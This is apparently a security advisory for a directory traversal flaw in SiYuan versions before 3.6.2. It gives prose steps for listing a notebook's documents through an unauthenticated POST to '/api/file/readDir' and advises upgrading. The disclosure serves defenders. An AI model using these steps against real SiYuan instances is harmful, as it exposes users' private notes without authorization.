SiYuan Personal Knowledge Management System Directory Traversal Vulnerability

A directory traversal vulnerability has been identified in SiYuan personal knowledge management system versions prior to 3.6.2. The vulnerability exists in the '/api/file/readDir' interface, which can be exploited to traverse directories and retrieve the names of all documents within a notebook. This issue has been patched in version 3.6.2.

Impact

Exploitation of this vulnerability allows for unauthorized directory traversal, enabling an attacker to access the entire directory structure of a notebook. This could be combined with a file reading vulnerability to read arbitrary documents.

Reproduction

The vulnerability can be reproduced by sending a POST request to the '/api/file/readDir' endpoint without authentication. The request should include a JSON payload specifying the path to be traversed. The response will contain the directory entries, which can be recursively explored up to a depth of two. The names of the files and folders can be saved to a 'readdir.json' file.

Remediation

Users are advised to update to SiYuan version 3.6.2 or later.